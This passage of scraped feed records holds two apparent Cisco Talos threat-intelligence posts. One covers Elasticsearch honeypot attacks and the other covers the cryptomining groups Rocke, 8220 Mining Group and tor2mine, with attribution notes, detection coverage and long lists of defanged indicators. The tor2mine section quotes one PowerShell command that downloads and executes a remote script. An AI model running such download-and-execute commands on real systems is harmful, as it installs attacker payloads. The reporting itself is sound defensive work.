a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n![](https://lh3.googleusercontent.com/XJsFnS3iySCDhU5N0-Yxv3mQJ-7LAJy_YtPNymczO7uz5eHLytkxtn2Zm7H1Kvxt7o0lDtuYJnIkG0rntKpKKJSXA2vv2IWBKETCPn519BTWoDHBmOKX7qWA4sLK7OCIkpmMFp3F) \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n![](https://lh5.googleusercontent.com/oFI8Hm9pbiDE-lFmJUFVsTx30OyS64_unXnXkrIlMPEu4id9kPwPHEdi-ryM-fYBS30DVRG9H2Kf6-Dwmxqn4kBR3uLjE7jxJFmoT98n4jrQ_Vvq_TlBxaepRqsGbRmY82xJFR7q) \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n![](https://lh4.googleusercontent.com/9Gbi0Ivp0hakdbXOCBQIj_LbcK6oSynf7O6-Xb8m7BTNxrHdhj3PRR-r-nb1Lca-Ue0u9EXkTFXgBpCjBsaDvnQFU16jpztqsMWBHGxBxg0FcYNtWY1J0UxncN-ekaSEuIAr0om-) \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/uGLhJU8rCm8)", "cvss3": {}, "published": "2019-02-26T10:56:00", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "modified": "2019-03-01T15:56:50", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-18T17:32:28", "description": "_Post authored by [David Liebenberg](<https://www.google.com/url?q=https://twitter.com/chinahanddave&sa=D&ust=1545149724666000>) and [Andrew Williams](<https://www.google.com/url?q=https://twitter.com/smugyeti&sa=D&ust=1545149724667000>)._ \n\n\n### Executive Summary\n\nThrough Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined. \n \nThis blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies. \n \nWe will cover the recent activities of these actors: \n\n\n * Rocke \u2014A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.\n * 8220 Mining Group \u2014Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.\n * Tor2Mine \u2014A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).\nThese groups have used similar TTPs, including: \n\n\n * Malicious shell scripts masquerading as JPEG files with the name \"logo*.jpg\" that install cron jobs and download and execute miners.\n * The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.\n * Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.\n * Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.\n * Tools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which can convert Python scripts into executables.\nWe were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. \n \nThe recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the [illicit cryptocurrency threat](<https://www.google.com/url?q=https://www.cyberthreatalliance.org/wp-content/uploads/2018/09/CTA-Illicit-CryptoMining-Whitepaper.pdf&sa=D&ust=1545149724689000>). However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published [separate research today covering this trend.](<https://blog.talosintelligence.com/2018/12/cryptocurrency-future-2018.html>) \n\n\n### Timeline of actors' campaigns\n\n#### [![](https://3.bp.blogspot.com/-jK9gU5Z4g6M/XBkSwhst2WI/AAAAAAAABh0/WgEn6WVJ0Aogu10HmoVBx-2CnIvTrCvTACLcBGAs/s1600/image5.jpg)](<https://3.bp.blogspot.com/-jK9gU5Z4g6M/XBkSwhst2WI/AAAAAAAABh0/WgEn6WVJ0Aogu10HmoVBx-2CnIvTrCvTACLcBGAs/s1600/image5.jpg>) \n--- \nTimeline of Activity \n \n#### Introduction\n\nIllicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware. \n \nThrough our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attack's wallets and command and control (C2) servers we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining. \n \nWe also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. \n \nWe first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs. \n \nWe began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named \"tor2mine,\" based on the fact that they additionally used tor2web services for C2 communications. \n \nWe also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits. \n \n\n\n#### \n\n#### Rocke/Iron cybercrime group\n\nCisco Talos wrote about [Rocke](<https://www.google.com/url?q=https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html&sa=D&ust=1545149724706000>) earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure. \n \nIn the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted [Jenkins ](<https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/new-jenkins-campaign-hides-malware--kills-competing-crypto-miner&sa=D&ust=1545149724712000>)and [JBoss](<https://www.google.com/url?q=https://www.alibabacloud.com/blog/jbossminer-mining-malware-analysis_593804&sa=D&ust=1545149724712000>) servers, continuing to rely on malicious Git repositories, as well as malicious [Amazon Machine Images](<https://www.google.com/url?q=https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/&sa=D&ust=1545149724714000>). They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware [capabilities](<https://www.google.com/url?q=https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/&sa=D&ust=1545149724714000>). Several campaigns used the XHide Process Faker tool. \n \nWe have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn. \n \nThe dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files. \n \nWhile keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called [whatMiner](<https://www.google.com/url?q=https://github.com/MRdoulestar/whatMiner&sa=D&ust=1545149724720000>), developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as \"collecting and integrating all different kinds of illicit mining malware.\" \n\n\n[![](https://1.bp.blogspot.com/-G3Rbkg_o3Mc/XBkTFOJxe5I/AAAAAAAABh8/BWe5f_IQcIkJPH7e45o9Rzvyyb1Zzq1bQCLcBGAs/s640/image2.png)](<https://1.bp.blogspot.com/-G3Rbkg_o3Mc/XBkTFOJxe5I/AAAAAAAABh8/BWe5f_IQcIkJPH7e45o9Rzvyyb1Zzq1bQCLcBGAs/s1600/image2.png>)\n\n#### \n\n#### Git repository for whatMiner\n\nLooking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors on to the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one. \n \nWhile looking through this repository, we found a folder called \"sustes.\" There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet. \n \nMany of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also made requests for a file called \"TermsHost.exe\" from an IP 39[.]108[.]177[.]252, as well as a file called \"xmr.txt\" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called \"TermsHost.exe\" hosted on their C2 ssvs[.]space and a Monero mining config file called \"xmr.txt\" on the C2 sydwzl[.]cn. \n \nWhen we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services. \n \nNote that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke\u2019s github since November, nor have we seen related samples in our honeypots since that time. \n \n\n\n#### 8220 Mining Group\n\nAs we previously described, Rocke originally forked a repository called \"whatMiner.\" We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor \u2014 8220 Mining Group \u2014 due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke. \n \nWe first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed: \n\n\n[![](https://1.bp.blogspot.com/-N8vmBZIyNH0/XBkTMgozjXI/AAAAAAAABiA/WdL1yKlWJVwqXSuzeKgozMuw2lg-xpQnACLcBGAs/s640/image6.png)](<https://1.bp.blogspot.com/-N8vmBZIyNH0/XBkTMgozjXI/AAAAAAAABiA/WdL1yKlWJVwqXSuzeKgozMuw2lg-xpQnACLcBGAs/s1600/image6.png>)\n\nWe were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 mining group is likely responsible for. \n \nThese campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited [Drupal](<https://www.google.com/url?q=https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/&sa=D&ust=1545149724754000>) content management system, [Hadoop YARN, Redis, Weblogic and Couch](<https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&sa=D&ust=1545149724756000>)[DB](<https://www.google.com/url?q=https://ti.360.net/blog/articles/8220-mining-gang-in-china/&sa=D&ust=1545149724757000>). Besides leveraging malicious bash scripts, Git repositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious [Docker images](<https://www.google.com/url?q=https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers&sa=D&ust=1545149724758000>). 8220 Mining Group was able to [amass](<https://www.google.com/url?q=https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html&sa=D&ust=1545149724759000>) nearly $200,000 worth of Monero through their campaigns. \n \nThere were some similarities to the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors downloaded a malicious file \"logo*.jpg\" (very similar to Rocke's use of malicious scripts under the file name of \"logo*.jpg payloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing. \n \n\n\n#### \n\n#### tor2mine\n\nOver the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge between the internet and the Tor network, a system that allows users to enable anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden. \n \nRecently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to. \n \nIt is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system: \n \n\n\n> C:\\\\\\Windows\\\\\\System32\\\\\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))\n\n \nWe identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and 32-bit variants of XMRigCC \u2014 a variant of the XMRig miner, Windows executable versions of publically available EternalBlue/EternalRomance exploit scripts,an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk. \n \nWe began to research the malware and infrastructure used in this campaign. We observed [previous research](<https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron&sa=D&ust=1545149724777000>) on a similar campaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, \"/win/checking-test.hta,\" that was almost identical to one we saw hosted on the tor2mine actors C2, \"check.hta:\" \n \n/win/checking-test.hta from [previous campaign](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) \n\n\n[![](https://1.bp.blogspot.com/-P0BM1YbmglE/XBkTUfYruyI/AAAAAAAABiE/cdM11HTIeMU_BLbLvaIufOkl8AlVgpphACLcBGAs/s640/image3.png)](<https://1.bp.blogspot.com/-P0BM1YbmglE/XBkTUfYruyI/AAAAAAAABiE/cdM11HTIeMU_BLbLvaIufOkl8AlVgpphACLcBGAs/s1600/image3.png>)\n\ncheck.hta \n\n\n[![](https://4.bp.blogspot.com/-xCD4IEajoAw/XBkTbbLPdpI/AAAAAAAABiM/iFRi_JfkjaYFKKbvu9WMvVdk-9x9_2KowCLcBGAs/s640/image4.png)](<https://4.bp.blogspot.com/-xCD4IEajoAw/XBkTbbLPdpI/AAAAAAAABiM/iFRi_JfkjaYFKKbvu9WMvVdk-9x9_2KowCLcBGAs/s1600/image4.png>)\n\nThis actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process-faker tool. \n \nSimilarly, in [February 2018](<https://www.google.com/url?q=https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerability-exploited-deliver-double-monero-miner-payloads/&sa=D&ust=1545149724785000>), Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw. \n \nThis malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign. \n \n\n\n#### \n\n#### Conclusion\n\nThrough tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate. \n \nThe value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue. \n \nThere remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as ransomware. However, Rocke\u2019s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig. \n \nTalos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies. \n \n\n\n#### \n\n#### Coverage\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://www.google.com/url?q=https://talosintelligence.com/resources/59&sa=D&ust=1545149724800000>) \n\n\n[![](https://3.bp.blogspot.com/-kLMMs2ca1vw/XBkTiaGFCAI/AAAAAAAABiQ/BnUOME636oc66-Lx9QJ2QKK2lbUlHb7rgCLcBGAs/s1600/image1.png)](<https://3.bp.blogspot.com/-kLMMs2ca1vw/XBkTiaGFCAI/AAAAAAAABiQ/BnUOME636oc66-Lx9QJ2QKK2lbUlHb7rgCLcBGAs/s1600/image1.png>)\n\n \nAdvanced Malware Protection ([AMP](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&sa=D&ust=1545149724807000>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&sa=D&ust=1545149724809000>)) or[ Web Security Appliance (WSA](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&sa=D&ust=1545149724810000>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1545149724813000>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1545149724814000>)), and[ Meraki MX](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1545149724816000>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&sa=D&ust=1545149724818000>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://www.google.com/url?q=https://umbrella.cisco.com/&sa=D&ust=1545149724820000>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.google.com/url?q=https://www.snort.org/products&sa=D&ust=1545149724823000>). \n \n\n\n### IOCs\n\n#### \n\n#### Rocke\n\nIPs: \n121[.]126[.]223[.]211 \n142[.]44[.]215[.]177 \n144[.]217[.]61[.]147 \n118[.]24[.]150[.]172 \n185[.]133[.]193[.]163 \n \nDomains: \nxmr.enjoytopic[.]tk \nd.paloaltonetworks[.]tk \nthreatpost[.]tk \n3g2upl4pq6kufc4m[.]tk \nscan.3g2upl4pq6kufc4m[.]tk \ne3sas6tzvehwgpak[.]tk \nsample.sydwzl[.]cn \nblockbitcoin[.]com \nscan.blockbitcoin[.]tk \ndazqc4f140wtl[.]cloudfront[.]net \nd3goboxon32grk2l[.]tk \nenjoytopic[.]tk \nrealtimenews[.]tk \n8282[.]space \n3389[.]space \nsvss[.]space \nenjoytopic[.]esy[.]es \nlienjoy[.]esy[.]es \nd3oxpv9ajpsgxt[.]cloudfront[.]net \nd3lvemwrafj7a7[.]cloudfront[.]net \nd1ebv77j9rbkp6[.]enjoytopic[.]com \nswb[.]one \nd1uga3uzpppiit[.]cloudfront[.]net \nemsisoft[.]enjoytopic[.]tk \nejectrift[.]censys[.]xyz \nscan[.]censys[.]xyz \napi[.]leakingprivacy[.]tk \nnews[.]realnewstime[.]xyz \nscan[.]realnewstime[.]xyz \nnews[.]realtimenews[.]tk \nscanaan[.]tk \nwww[.]qicheqiche[.]com \n \nURLs: \nhxxps://github[.]com/yj12ni \nhxxps://github[.]com/rocke \nhxxps://github[.]com/freebtcminer/ \nhxxps://github[.]com/tightsoft \nhxxps://raw[.]githubusercontent[.]com/ghostevilxp \nhxxp://www[.]qicheqiche[.]com \nhxxp://123[.]206[.]13[.]220:8899 \nhxxps://gitee[.]com/c-888/ \nhxxp://gitlab[.]com/c-18 \nhxxp://www[.]ssvs[.]space/root[.]bin \nhxxp://a[.]ssvs[.]space/db[.]sh \nhxxp://a[.]ssvs[.]space/cf[.]cf \nhxxp://a[.]ssvs[.]space/pluto \nhxxp://ip[.]ssvs[.]space/xm64 \nhxxp://ip[.]ssvs[.]space/wt[.]conf \nhxxp://ip[.]ssvs[.]space/mr[.]sh \nhxxp://a[.]ssvs[.]space/logo[.]jpg \nhxxp://a[.]sydwzl[.]cn/root[.]bin \nhxxp://a[.]sydwzl[.]cn/x86[.]bin \nhxxp://a[.]sydwzl[.]cn/bar[.]sh \nhxxp://a[.]sydwzl[.]cn/crondb \nhxxp://a[.]sydwzl[.]cn/pools[.]txt \nhxxps://pastebin[.]com/raw/5bjpjvLP \nhxxps://pastebin[.]com/raw/Fj2YdETv \nhxxps://pastebin[.]com/raw/eRkrSQfE \nhxxps://pastebin[.]com/raw/Gw7mywhC \nhxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg \nhxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg \nhxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg \nhxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg \nhxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg 